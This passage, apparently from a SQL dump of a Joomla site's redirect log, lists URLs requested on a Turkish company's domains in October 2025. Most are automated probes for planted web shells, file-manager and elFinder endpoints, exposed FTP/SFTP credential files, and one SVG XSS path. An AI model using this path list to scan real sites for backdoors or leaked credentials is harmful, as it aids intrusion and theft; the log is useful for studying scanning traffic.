16:55:10','0000-00-00 00:00:00',301),(48177,'http://www.3s-technologies.com.tr/tr/build.php',NULL,'','',6,0,'2025-10-16 16:55:12','0000-00-00 00:00:00',301),(48178,'http://www.3s-technologies.com.tr/tr/asas.php',NULL,'','',5,0,'2025-10-16 16:55:14','0000-00-00 00:00:00',301),(48179,'http://www.3s-technologies.com.tr/tr/wa.php',NULL,'','',1,0,'2025-10-16 16:55:16','0000-00-00 00:00:00',301),(48180,'http://www.3s-technologies.com.tr/tr/wb.php',NULL,'','',4,0,'2025-10-16 16:55:17','0000-00-00 00:00:00',301),(48181,'http://mail.3s-technologies.com.tr/tr/dove.php',NULL,'','',2,0,'2025-10-16 17:02:50','0000-00-00 00:00:00',301),(48182,'http://mail.3s-technologies.com.tr/tr/asas.php',NULL,'','',12,0,'2025-10-16 17:03:04','0000-00-00 00:00:00',301),(48183,'http://3s-technologies.com.tr/tr/n1.php',NULL,'','',2,0,'2025-10-17 15:40:49','0000-00-00 00:00:00',301),(48184,'http://3s-technologies.com.tr/tr/gelap1.php',NULL,'','',1,0,'2025-10-17 15:40:49','0000-00-00 00:00:00',301),(48185,'http://3s-technologies.com.tr/tr/478.php',NULL,'','',1,0,'2025-10-17 15:40:50','0000-00-00 00:00:00',301),(48186,'http://3s-technologies.com.tr/tr/zwlj.php',NULL,'','',1,0,'2025-10-17 15:40:54','0000-00-00 00:00:00',301),(48187,'http://3s-technologies.com.tr/tr/oxse.php',NULL,'','',2,0,'2025-10-17 15:40:55','0000-00-00 00:00:00',301),(48188,'http://3s-technologies.com.tr/tr/ccaef.php',NULL,'','',1,0,'2025-10-17 15:40:57','0000-00-00 00:00:00',301),(48189,'http://3s-technologies.com.tr/tr/kesa.php',NULL,'','',1,0,'2025-10-17 15:40:59','0000-00-00 00:00:00',301),(48190,'http://3s-technologies.com.tr/tr/ev.php',NULL,'','',1,0,'2025-10-17 15:40:59','0000-00-00 00:00:00',301),(48191,'http://3s-technologies.com.tr/tr/dxb.php',NULL,'','',1,0,'2025-10-17 15:41:03','0000-00-00 00:00:00',301),(48192,'http://3s-technologies.com.tr/tr/wawja.php',NULL,'','',1,0,'2025-10-17 15:41:07','0000-00-00 00:00:00',301),(48193,'http://3s-technologies.com.tr/tr/chatypro.php',NULL,'','',1,0,'2025-10-17 15:41:07','0000-00-00 00:00:00',301),(48194,'http://3s-technologies.com.tr/tr/cmnk.php',NULL,'','',1,0,'2025-10-17 15:41:09','0000-00-00 00:00:00',301),(48195,'http://3s-technologies.com.tr/tr/o2ll13.php',NULL,'','',1,0,'2025-10-17 15:41:10','0000-00-00 00:00:00',301),(48196,'http://3s-technologies.com.tr/tr/xl6.php',NULL,'','',5,0,'2025-10-17 15:41:10','0000-00-00 00:00:00',301),(48197,'http://3s-technologies.com.tr/tr/pu.php',NULL,'','',7,0,'2025-10-17 15:41:11','0000-00-00 00:00:00',301),(48198,'http://3s-technologies.com.tr/tr/xd.php',NULL,'','',1,0,'2025-10-17 15:41:12','0000-00-00 00:00:00',301),(48199,'http://3s-technologies.com.tr/tr/wefile.php',NULL,'','',31,0,'2025-10-17 15:41:16','0000-00-00 00:00:00',301),(48200,'http://3s-technologies.com.tr/tr/eifjp.php',NULL,'','',1,0,'2025-10-17 15:41:17','0000-00-00 00:00:00',301),(48201,'http://3s-technologies.com.tr/tr/xs.php',NULL,'','',34,0,'2025-10-17 15:41:19','0000-00-00 00:00:00',301),(48202,'http://3s-technologies.com.tr/tr/xxa.php',NULL,'','',19,0,'2025-10-17 15:41:21','0000-00-00 00:00:00',301),(48203,'http://3s-technologies.com.tr/tr/jx.php',NULL,'','',1,0,'2025-10-17 15:41:32','0000-00-00 00:00:00',301),(48204,'http://3s-technologies.com.tr/joomla/index.php?itemid=58&id=168&lang=en&option=com_content&view=article',NULL,'http://3s-technologies.com.tr/joomla/index.php?Itemid=58&id=168&lang=en&option=com_content&view=article','',2,0,'2025-10-17 19:47:54','0000-00-00 00:00:00',301),(48205,'https://3s-technologies.com.tr/joomla/index.php?itemid=58&id=168&lang=en&option=com_content&view=article',NULL,'https://3s-technologies.com.tr/joomla/index.php?Itemid=58&id=168&lang=en&option=com_content&view=article','',2,0,'2025-10-17 19:48:17','0000-00-00 00:00:00',301),(48206,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/index.php','',1,0,'2025-10-18 22:42:59','0000-00-00 00:00:00',301),(48207,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/index.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/sunrise/index.php','',2,0,'2025-10-18 22:43:12','0000-00-00 00:00:00',301),(48208,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/utils/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/utils/index.php','',1,0,'2025-10-18 22:43:21','0000-00-00 00:00:00',301),(48209,'http://3s-technologies.com.tr/tr/var/html/uploads',NULL,'http://3s-technologies.com.tr/var/html/uploads/','',1,0,'2025-10-18 22:46:16','0000-00-00 00:00:00',301),(48210,'http://3s-technologies.com.tr/tr/site/buy.php',NULL,'http://3s-technologies.com.tr/site/buy.php','',1,0,'2025-10-18 22:46:39','0000-00-00 00:00:00',301),(48211,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyseventeen/inc/motu.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentyseventeen/inc/motu.php','',1,0,'2025-10-18 22:48:09','0000-00-00 00:00:00',301),(48212,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix/motu.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fix/motu.php','',1,0,'2025-10-18 22:48:12','0000-00-00 00:00:00',301),(48213,'http://3s-technologies.com.tr/tr/motu.php',NULL,'http://3s-technologies.com.tr/motu.php','',101,0,'2025-10-18 22:48:16','0000-00-00 00:00:00',301),(48214,'http://3s-technologies.com.tr/tr/wp-content/uploads/elementor/css/motu.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/elementor/css/motu.php','',1,0,'2025-10-18 22:48:17','0000-00-00 00:00:00',301),(48215,'http://3s-technologies.com.tr/tr/wp-content/msi/assets/image/foto_reseller/motu.php',NULL,'http://3s-technologies.com.tr/wp-content/msi/assets/image/foto_reseller/motu.php','',1,0,'2025-10-18 22:48:18','0000-00-00 00:00:00',301),(48216,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/motu.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/apikey/motu.php','',1,0,'2025-10-18 22:48:21','0000-00-00 00:00:00',301),(48217,'http://3s-technologies.com.tr/tr/feifq.php',NULL,'http://3s-technologies.com.tr/feifq.php','',1,0,'2025-10-18 22:49:00','0000-00-00 00:00:00',301),(48218,'http://3s-technologies.com.tr/tr/css/about.php',NULL,'http://3s-technologies.com.tr/css/about.php','',1,0,'2025-10-18 22:49:05','0000-00-00 00:00:00',301),(48219,'http://3s-technologies.com.tr/tr/wp-admin/network/motu.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/motu.php','',1,0,'2025-10-18 22:49:19','0000-00-00 00:00:00',301),(48220,'http://3s-technologies.com.tr/tr/wp-admin/includes/about.phps',NULL,'http://3s-technologies.com.tr/wp-admin/includes/about.phps','',1,0,'2025-10-18 22:50:00','0000-00-00 00:00:00',301),(48221,'http://3s-technologies.com.tr/tr/wp-links.phps',NULL,'http://3s-technologies.com.tr/wp-links.phps','',1,0,'2025-10-18 22:50:25','0000-00-00 00:00:00',301),(48222,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/about.phps',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/about.phps','',1,0,'2025-10-18 22:50:26','0000-00-00 00:00:00',301),(48223,'http://3s-technologies.com.tr/tr/coldsellers.php',NULL,'http://3s-technologies.com.tr/Coldsellers.php','',1,0,'2025-10-18 22:50:29','0000-00-00 00:00:00',301),(48224,'http://3s-technologies.com.tr/tr/assistant.php',NULL,'','',1,0,'2025-10-18 23:05:07','0000-00-00 00:00:00',301),(48225,'http://3s-technologies.com.tr/tr/asas.php',NULL,'','',22,0,'2025-10-18 23:05:08','0000-00-00 00:00:00',301),(48226,'http://3s-technologies.com.tr/tr/sosu.php',NULL,'','',3,0,'2025-10-18 23:05:09','0000-00-00 00:00:00',301),(48227,'http://3s-technologies.com.tr/tr/wp-extends.php',NULL,'','',2,0,'2025-10-18 23:05:10','0000-00-00 00:00:00',301),(48228,'http://3s-technologies.com.tr/tr/mrrpl.php',NULL,'','',1,0,'2025-10-18 23:05:11','0000-00-00 00:00:00',301),(48229,'http://3s-technologies.com.tr/tr/964non.php',NULL,'','',1,0,'2025-10-18 23:05:18','0000-00-00 00:00:00',301),(48230,'http://3s-technologies.com.tr/tr/taktak.php',NULL,'','',4,0,'2025-10-19 05:43:07','0000-00-00 00:00:00',301),(48231,'http://3s-technologies.com.tr/tr/gt.php',NULL,'','',4,0,'2025-10-19 05:43:08','0000-00-00 00:00:00',301),(48232,'http://3s-technologies.com.tr/tr/aghbvr.php',NULL,'','',4,0,'2025-10-19 05:43:08','0000-00-00 00:00:00',301),(48233,'http://3s-technologies.com.tr/tr/miso.php',NULL,'','',9,0,'2025-10-19 05:43:09','0000-00-00 00:00:00',301),(48234,'http://3s-technologies.com.tr/tr/taff.php',NULL,'','',8,0,'2025-10-19 05:43:11','0000-00-00 00:00:00',301),(48235,'http://3s-technologies.com.tr/tr/bless11.php',NULL,'','',63,0,'2025-10-19 05:43:11','0000-00-00 00:00:00',301),(48236,'http://3s-technologies.com.tr/tr/tor.php',NULL,'','',8,0,'2025-10-19 05:43:45','0000-00-00 00:00:00',301),(48237,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/mod_fxprev.xml',NULL,'','',7,0,'2025-10-19 16:12:21','0000-00-00 00:00:00',301),(48238,'http://3s-technologies.com.tr/tr/wp-content/lock360.php',NULL,'','',10,0,'2025-10-20 01:26:03','0000-00-00 00:00:00',301),(48239,'http://3s-technologies.com.tr/tr/wp-content/aa.php',NULL,'','',6,0,'2025-10-20 01:26:06','0000-00-00 00:00:00',301),(48240,'http://3s-technologies.com.tr/tr/wp-content/ioxi-o.php',NULL,'','',6,0,'2025-10-20 01:26:07','0000-00-00 00:00:00',301),(48241,'http://3s-technologies.com.tr/tr/wp-content/bala.php',NULL,'','',6,0,'2025-10-20 01:26:09','0000-00-00 00:00:00',301),(48242,'http://3s-technologies.com.tr/tr/wp-content/abcd.php',NULL,'','',6,0,'2025-10-20 01:26:11','0000-00-00 00:00:00',301),(48243,'http://3s-technologies.com.tr/tr/wp-content/ab.php',NULL,'','',6,0,'2025-10-20 01:26:12','0000-00-00 00:00:00',301),(48244,'http://3s-technologies.com.tr/tr/wp-content/ova.php',NULL,'','',6,0,'2025-10-20 01:26:14','0000-00-00 00:00:00',301),(48245,'http://3s-technologies.com.tr/tr/wp-content/wsa.php',NULL,'','',6,0,'2025-10-20 01:26:14','0000-00-00 00:00:00',301),(48246,'http://3s-technologies.com.tr/tr/manager/media/script/mootools/mootools.js',NULL,'','',5,0,'2025-10-20 02:51:21','0000-00-00 00:00:00',301),(48247,'http://3s-technologies.com.tr/tr/manager/assets/modext/core/modx.js',NULL,'','',4,0,'2025-10-20 02:52:51','0000-00-00 00:00:00',301),(48248,'http://3s-technologies.com.tr/tr/geger.php',NULL,'','',4,0,'2025-10-20 19:26:56','0000-00-00 00:00:00',301),(48249,'http://3s-technologies.com.tr/tr/cli/joomla.php',NULL,'','',4,0,'2025-10-20 21:46:45','0000-00-00 00:00:00',301),(48250,'http://3s-technologies.com.tr/tr/installation/gpl.html',NULL,'','',2,0,'2025-10-21 07:58:05','0000-00-00 00:00:00',301),(48251,'http://3s-technologies.com.tr/tr/installation/localise.xml',NULL,'','',2,0,'2025-10-21 07:58:05','0000-00-00 00:00:00',301),(48252,'http://3s-technologies.com.tr/tr/akpc.php',NULL,'','',1,0,'2025-10-21 11:03:43','0000-00-00 00:00:00',301),(48253,'http://3s-technologies.com.tr/tr/dove.php',NULL,'','',1,0,'2025-10-21 11:04:02','0000-00-00 00:00:00',301),(48254,'http://3s-technologies.com.tr/tr/_installation/localise.xml',NULL,'','',1,0,'2025-10-21 16:31:41','0000-00-00 00:00:00',301),(48255,'http://3s-technologies.com.tr/tr/_installation/gpl.html',NULL,'','',1,0,'2025-10-21 16:31:41','0000-00-00 00:00:00',301),(48256,'http://mail.3s-technologies.com.tr/tr/wsad.php',NULL,'','',3,0,'2025-10-21 16:54:37','0000-00-00 00:00:00',301),(48257,'http://mail.3s-technologies.com.tr/tr/np.php',NULL,'','',4,0,'2025-10-21 16:54:38','0000-00-00 00:00:00',301),(48258,'http://mail.3s-technologies.com.tr/tr/xpw.php',NULL,'','',3,0,'2025-10-21 16:54:42','0000-00-00 00:00:00',301),(48259,'http://mail.3s-technologies.com.tr/tr/geger.php',NULL,'','',3,0,'2025-10-21 16:54:55','0000-00-00 00:00:00',301),(48260,'http://mail.3s-technologies.com.tr/tr/yca.php',NULL,'','',3,0,'2025-10-21 16:54:59','0000-00-00 00:00:00',301),(48261,'http://mail.3s-technologies.com.tr/tr/readme.php',NULL,'','',35,0,'2025-10-21 16:55:00','0000-00-00 00:00:00',301),(48262,'http://mail.3s-technologies.com.tr/tr/natural.php',NULL,'','',3,0,'2025-10-21 16:55:16','0000-00-00 00:00:00',301),(48263,'http://mail.3s-technologies.com.tr/tr/0x.php',NULL,'','',62,0,'2025-10-21 16:55:22','0000-00-00 00:00:00',301),(48264,'http://mail.3s-technologies.com.tr/tr/wp-admin/index.php',NULL,'','',13,0,'2025-10-21 16:55:26','0000-00-00 00:00:00',301),(48265,'http://mail.3s-technologies.com.tr/tr/ay.php',NULL,'','',5,0,'2025-10-21 16:55:31','0000-00-00 00:00:00',301),(48266,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/themes.php',NULL,'','',3,0,'2025-10-21 16:55:50','0000-00-00 00:00:00',301),(48267,'http://mail.3s-technologies.com.tr/tr/zse.php',NULL,'','',3,0,'2025-10-21 16:55:51','0000-00-00 00:00:00',301),(48268,'http://3s-technologies.com.tr/tr/wp-content/edit.php',NULL,'','',6,0,'2025-10-21 17:35:11','0000-00-00 00:00:00',301),(48269,'http://3s-technologies.com.tr/tr/wp-content/goat.php',NULL,'','',3,0,'2025-10-21 17:35:12','0000-00-00 00:00:00',301),(48270,'http://3s-technologies.com.tr/tr/wp-content/mm.php',NULL,'','',3,0,'2025-10-21 17:35:12','0000-00-00 00:00:00',301),(48271,'http://3s-technologies.com.tr/tr/wp-content/users.php',NULL,'','',5,0,'2025-10-21 17:35:13','0000-00-00 00:00:00',301),(48272,'http://3s-technologies.com.tr/tr/wp-content/goods.php',NULL,'','',3,0,'2025-10-21 17:35:14','0000-00-00 00:00:00',301),(48273,'http://3s-technologies.com.tr/tr/wp-content/gecko.php',NULL,'','',3,0,'2025-10-21 17:35:18','0000-00-00 00:00:00',301),(48274,'http://3s-technologies.com.tr/tr/wp-content/autoload_classmap/function.php',NULL,'','',3,0,'2025-10-21 17:35:20','0000-00-00 00:00:00',301),(48275,'http://3s-technologies.com.tr/tr/wp-content/chosen.php',NULL,'','',3,0,'2025-10-21 17:35:22','0000-00-00 00:00:00',301),(48276,'http://3s-technologies.com.tr/tr/wp-content/w.php',NULL,'','',3,0,'2025-10-21 17:35:24','0000-00-00 00:00:00',301),(48277,'http://3s-technologies.com.tr/tr/wp-content/buy.php',NULL,'','',5,0,'2025-10-21 17:35:24','0000-00-00 00:00:00',301),(48278,'http://3s-technologies.com.tr/tr/wp-content/akc.php',NULL,'','',3,0,'2025-10-21 17:35:25','0000-00-00 00:00:00',301),(48279,'http://3s-technologies.com.tr/tr/wp-content/asasx.php',NULL,'','',3,0,'2025-10-21 17:35:32','0000-00-00 00:00:00',301),(48280,'http://3s-technologies.com.tr/tr/wp-content/file2.php',NULL,'','',5,0,'2025-10-21 17:35:33','0000-00-00 00:00:00',301),(48281,'http://3s-technologies.com.tr/tr/wp-content/flower.php',NULL,'','',3,0,'2025-10-21 17:35:36','0000-00-00 00:00:00',301),(48282,'http://3s-technologies.com.tr/tr/wp-content/code.php',NULL,'','',3,0,'2025-10-21 17:35:41','0000-00-00 00:00:00',301),(48283,'http://3s-technologies.com.tr/tr/wp-content/style.php',NULL,'http://3s-technologies.com.tr/wp-content/style.php','',17,0,'2025-10-21 17:36:02','0000-00-00 00:00:00',301),(48284,'http://3s-technologies.com.tr/tr/wp-content/themes/style.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/style.php','',16,0,'2025-10-21 17:36:03','0000-00-00 00:00:00',301),(48285,'http://3s-technologies.com.tr/tr/wp-includes/style.php',NULL,'http://3s-technologies.com.tr/wp-includes/style.php','',16,0,'2025-10-21 17:36:04','0000-00-00 00:00:00',301),(48286,'http://3s-technologies.com.tr/tr/wp-includes/js/thickbox/thickbox.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/thickbox/thickbox.php','',3,0,'2025-10-21 17:36:12','0000-00-00 00:00:00',301),(48287,'http://3s-technologies.com.tr/tr/zoo.php',NULL,'http://3s-technologies.com.tr/zoo.php','',22,0,'2025-10-21 17:36:13','0000-00-00 00:00:00',301),(48288,'http://3s-technologies.com.tr/tr/kyami.php',NULL,'','',10,0,'2025-10-21 20:17:04','0000-00-00 00:00:00',301),(48289,'http://3s-technologies.com.tr/tr/administrator/components/com_jvframework/libraries/elfinder-2.0-rc1/php/connector.php',NULL,'','',1,0,'2025-10-21 20:36:09','0000-00-00 00:00:00',301),(48290,'http://3s-technologies.com.tr/tr/codehu.php',NULL,'','',2,0,'2025-10-21 21:17:32','0000-00-00 00:00:00',301),(48291,'http://3s-technologies.com.tr/tr/enigma2.php',NULL,'','',1,0,'2025-10-21 21:17:33','0000-00-00 00:00:00',301),(48292,'http://3s-technologies.com.tr/tr/gos.php',NULL,'','',1,0,'2025-10-21 21:18:31','0000-00-00 00:00:00',301),(48293,'http://3s-technologies.com.tr/tr/bes.php',NULL,'','',6,0,'2025-10-21 21:18:40','0000-00-00 00:00:00',301),(48294,'http://3s-technologies.com.tr/tr/themes/theme_back/js/plugins/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2025-10-22 08:22:08','0000-00-00 00:00:00',301),(48295,'http://3s-technologies.com.tr/tr/ves_base/elfinder/php/connector.php',NULL,'','',1,0,'2025-10-22 08:22:08','0000-00-00 00:00:00',301),(48296,'http://3s-technologies.com.tr/tr/god4m.php',NULL,'','',30,0,'2025-10-22 13:33:33','0000-00-00 00:00:00',301),(48297,'http://3s-technologies.com.tr/tr/.idea/sftp.json',NULL,'http://3s-technologies.com.tr/.idea/sftp.json','',2,0,'2025-10-23 15:16:10','0000-00-00 00:00:00',301),(48298,'http://3s-technologies.com.tr/tr/.vscode/ftp.json',NULL,'http://3s-technologies.com.tr/.vscode/ftp.json','',2,0,'2025-10-23 15:16:11','0000-00-00 00:00:00',301),(48299,'http://3s-technologies.com.tr/tr/prevlaravel/sftp-config.json',NULL,'http://3s-technologies.com.tr/prevlaravel/sftp-config.json','',2,0,'2025-10-23 15:16:11','0000-00-00 00:00:00',301),(48300,'http://3s-technologies.com.tr/tr/config/ftp.json',NULL,'http://3s-technologies.com.tr/config/ftp.json','',2,0,'2025-10-23 15:16:11','0000-00-00 00:00:00',301),(48301,'http://3s-technologies.com.tr/tr/deploy.json',NULL,'http://3s-technologies.com.tr/deploy.json','',2,0,'2025-10-23 15:16:11','0000-00-00 00:00:00',301),(48302,'http://3s-technologies.com.tr/tr/.idea/ftp.json',NULL,'http://3s-technologies.com.tr/.idea/ftp.json','',2,0,'2025-10-23 15:16:12','0000-00-00 00:00:00',301),(48303,'http://3s-technologies.com.tr/tr/config/sftp.json',NULL,'http://3s-technologies.com.tr/config/sftp.json','',3,0,'2025-10-23 15:16:12','0000-00-00 00:00:00',301),(48304,'http://3s-technologies.com.tr/tr/rest',NULL,'','',5,0,'2025-10-23 23:41:51','0000-00-00 00:00:00',301),(48305,'https://www.3s-technologies.com.tr/tr/media/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/media/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',2,0,'2025-10-24 05:16:34','0000-00-00 00:00:00',301),(48306,'http://3s-technologies.com.tr/tr/wp-admin/asasx.php',NULL,'','',1,0,'2025-10-24 17:52:50','0000-00-00 00:00:00',301),(48307,'http://3s-technologies.com.tr/tr/wp-admin/ab.php',NULL,'','',1,0,'2025-10-24 17:52:57','0000-00-00 00:00:00',301),(48308,'http://3s-technologies.com.tr/tr/wp-admin/akc.php',NULL,'','',1,0,'2025-10-24 17:52:59','0000-00-00 00:00:00',301),(48309,'http://3s-technologies.com.tr/tr/wp-admin/file2.php',NULL,'','',1,0,'2025-10-24 17:53:01','0000-00-00 00:00:00',301),(48310,'http://3s-technologies.com.tr/tr/wp-admin/wsa.php',NULL,'','',1,0,'2025-10-24 17:53:02','0000-00-00 00:00:00',301),(48311,'http://3s-technologies.com.tr/tr/wp-admin/mm.php',NULL,'','',1,0,'2025-10-24 17:53:02','0000-00-00 00:00:00',301),(48312,'http://3s-technologies.com.tr/tr/wp-admin/abcd.php',NULL,'','',1,0,'2025-10-24 17:53:04','0000-00-00 00:00:00',301),(48313,'http://3s-technologies.com.tr/tr/wp-admin/lock360.php',NULL,'','',1,0,'2025-10-24 17:53:04','0000-00-00 00:00:00',301),(48314,'http://3s-technologies.com.tr/tr/wp-admin/moon.php',NULL,'','',1,0,'2025-10-24 17:53:09','0000-00-00 00:00:00',301),(48315,'http://3s-technologies.com.tr/tr/wp-admin/flower.php',NULL,'','',1,0,'2025-10-24 17:53:13','0000-00-00 00:00:00',301),(48316,'http://3s-technologies.com.tr/tr/wp-admin/edit.php',NULL,'','',1,0,'2025-10-24 17:53:20','0000-00-00 00:00:00',301),(48317,'http://3s-technologies.com.tr/tr/wp-admin/makeasmtp.php',NULL,'','',1,0,'2025-10-24 17:53:23','0000-00-00 00:00:00',301),(48318,'http://3s-technologies.com.tr/tr/wp-admin/w.php',NULL,'','',1,0,'2025-10-24 17:53:24','0000-00-00 00:00:00',301),(48319,'http://3s-technologies.com.tr/tr/wp-admin/goat.php',NULL,'','',1,0,'2025-10-24 17:53:26','0000-00-00 00:00:00',301),(48320,'http://3s-technologies.com.tr/tr/wp-admin/gecko.php',NULL,'','',1,0,'2025-10-24 17:53:29','0000-00-00 00:00:00',301),(48321,'http://3s-technologies.com.tr/tr/wp-admin/goods.php',NULL,'','',1,0,'2025-10-24 17:53:34','0000-00-00 00:00:00',301),(48322,'http://3s-technologies.com.tr/tr/wp-admin/bala.php',NULL,'','',1,0,'2025-10-24 17:53:35','0000-00-00 00:00:00',301),(48323,'http://3s-technologies.com.tr/tr/wp-admin/aa.php',NULL,'','',1,0,'2025-10-24 17:53:36','0000-00-00 00:00:00',301),(48324,'http://3s-technologies.com.tr/tr/wp-admin/autoload_classmap/function.php',NULL,'','',1,0,'2025-10-24 17:53:37','0000-00-00 00:00:00',301),(48325,'http://3s-technologies.com.tr/tr/wp-admin/ioxi-o.php',NULL,'','',1,0,'2025-10-24 17:53:38','0000-00-00 00:00:00',301),(48326,'http://3s-technologies.com.tr/tr/wp-admin/ova.php',NULL,'','',1,0,'2025-10-24 17:53:39','0000-00-00 00:00:00',301),(48327,'http://3s-technologies.com.tr/tr/wp-admin/tinyfilemanager.php',NULL,'','',1,0,'2025-10-24 17:53:43','0000-00-00 00:00:00',301),(48328,'http://3s-technologies.com.tr/tr/code.php',NULL,'','',1,0,'2025-10-24 17:53:49','0000-00-00 00:00:00',301),(48329,'https://3s-technologies.com.tr/tr/rs:fill:3840:3840:0:0/plain/https:/images.ctfassets.net/h0jtq0wdx190/3hivodbwvd7qcdxed53fx0/484ffd97340457cd7f1b954be06b5432/svg_webpage_xss.svg',NULL,'https://3s-technologies.com.tr/rs:fill:3840:3840:0:0/plain/https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg','',2,0,'2025-10-25 09:11:22','0000-00-00 00:00:00',301),(48330,'http://mail.3s-technologies.com.tr/tr/public_html',NULL,'','',2,0,'2025-10-25 13:14:40','0000-00-00 00:00:00',301),(48331,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/topxoh/wdr.php',NULL,'','',3,0,'2025-10-25 13:14:42','0000-00-00 00:00:00',301),(48332,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/rk2.php',NULL,'','',9,0,'2025-10-25 13:14:45','0000-00-00 00:00:00',301),(48333,'http://mail.3s-technologies.com.tr/tr/license.php',NULL,'','',5,0,'2025-10-25 13:14:46','0000-00-00 00:00:00',301),(48334,'http://mail.3s-technologies.com.tr/tr/wp-includes/assets/index.php',NULL,'','',62,0,'2025-10-25 13:14:49','0000-00-00 00:00:00',301),(48335,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/index.php',NULL,'','',11,0,'2025-10-25 13:14:49','0000-00-00 00:00:00',301),(48336,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/init.php',NULL,'','',6,0,'2025-10-25 13:14:51','0000-00-00 00:00:00',301),(48337,'http://mail.3s-technologies.com.tr/tr/wp-includes/autoload_classmap.php',NULL,'','',5,0,'2025-10-25 13:14:52','0000-00-00 00:00:00',301),(48338,'http://mail.3s-technologies.com.tr/tr/wp-content/403.php',NULL,'','',3,0,'2025-10-25 13:14:53','0000-00-00 00:00:00',301),(48339,'http://mail.3s-technologies.com.tr/tr/css/colors/coffee/index.php',NULL,'','',3,0,'2025-10-25 13:14:53','0000-00-00 00:00:00',301),(48340,'http://mail.3s-technologies.com.tr/tr/network.php',NULL,'','',16,0,'2025-10-25 13:15:01','0000-00-00 00:00:00',301),(48341,'http://mail.3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-login.php',NULL,'','',18,0,'2025-10-25 13:15:03','0000-00-00 00:00:00',301),(48342,'http://mail.3s-technologies.com.tr/tr/wp-includes/system_log.php',NULL,'','',3,0,'2025-10-25 13:15:05','0000-00-00 00:00:00',301),(48343,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/index.php',NULL,'','',22,0,'2025-10-25 13:15:07','0000-00-00 00:00:00',301),(48344,'http://mail.3s-technologies.com.tr/tr/plugins/pwnd/as.php',NULL,'','',3,0,'2025-10-25 13:15:08','0000-00-00 00:00:00',301),(48345,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/wp-conflg.php?p=',NULL,'','',3,0,'2025-10-25 13:15:09','0000-00-00 00:00:00',301),(48346,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/crop/zmfm.php',NULL,'','',4,0,'2025-10-25 13:15:10','0000-00-00 00:00:00',301),(48347,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/fields/index.php',NULL,'','',5,0,'2025-10-25 13:15:10','0000-00-00 00:00:00',301),(48348,'http://mail.3s-technologies.com.tr/tr/index/fucku.php',NULL,'','',3,0,'2025-10-25 13:15:11','0000-00-00 00:00:00',301),(48349,'http://mail.3s-technologies.com.tr/tr/upload/wp-info.php',NULL,'','',3,0,'2025-10-25 13:15:11','0000-00-00 00:00:00',301),(48350,'https://www.3s-technologies.com.tr/en/templates/beez5/images/icon_external_link.gif',NULL,'','',1,0,'2025-10-25 15:13:15','0000-00-00 00:00:00',301),(48351,'http://mail.3s-technologies.com.tr/tr/wpo.php',NULL,'','',8,0,'2025-10-25 21:55:31','0000-00-00 00:00:00',301),(48352,'http://mail.3s-technologies.com.tr/tr/shellalfa.php',NULL,'','',7,0,'2025-10-25 21:55:31','0000-00-00 00:00:00',301),(48353,'http://mail.3s-technologies.com.tr/tr/owl.php',NULL,'','',11,0,'2025-10-25 21:55:32','0000-00-00 00:00:00',301),(48354,'http://mail.3s-technologies.com.tr/tr/n.php',NULL,'','',11,0,'2025-10-25 21:55:34','0000-00-00 00:00:00',301),(48355,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/about.php',NULL,'','',8,0,'2025-10-25 21:55:37','0000-00-00 00:00:00',301),(48356,'http://mail.3s-technologies.com.tr/tr/ab.php',NULL,'','',4,0,'2025-10-25 21:55:43','0000-00-00 00:00:00',301),(48357,'http://mail.3s-technologies.com.tr/tr/enclas.php',NULL,'','',8,0,'2025-10-25 21:55:49','0000-00-00 00:00:00',301),(48358,'http://mail.3s-technologies.com.tr/tr/a3.php',NULL,'','',2,0,'2025-10-25 21:55:54','0000-00-00 00:00:00',301),(48359,'http://mail.3s-technologies.com.tr/tr/taktak.php',NULL,'','',2,0,'2025-10-25 21:56:06','0000-00-00 00:00:00',301),(48360,'http://mail.3s-technologies.com.tr/tr/gt.php',NULL,'','',2,0,'2025-10-25 21:56:08','0000-00-00 00:00:00',301),(48361,'http://mail.3s-technologies.com.tr/tr/aghbvr.php',NULL,'','',2,0,'2025-10-25 21:56:09','0000-00-00 00:00:00',301),(48362,'http://mail.3s-technologies.com.tr/tr/miso.php',NULL,'','',5,0,'2025-10-25 21:56:10','0000-00-00 00:00:00',301),(48363,'http://mail.3s-technologies.com.tr/tr/fex.php',NULL,'','',2,0,'2025-10-25 21:56:12','0000-00-00 00:00:00',301),(48364,'http://mail.3s-technologies.com.tr/tr/taff.php',NULL,'','',2,0,'2025-10-25 21:56:13','0000-00-00 00:00:00',301),(48365,'http://mail.3s-technologies.com.tr/tr/bless11.php',NULL,'','',32,0,'2025-10-25 21:56:14','0000-00-00 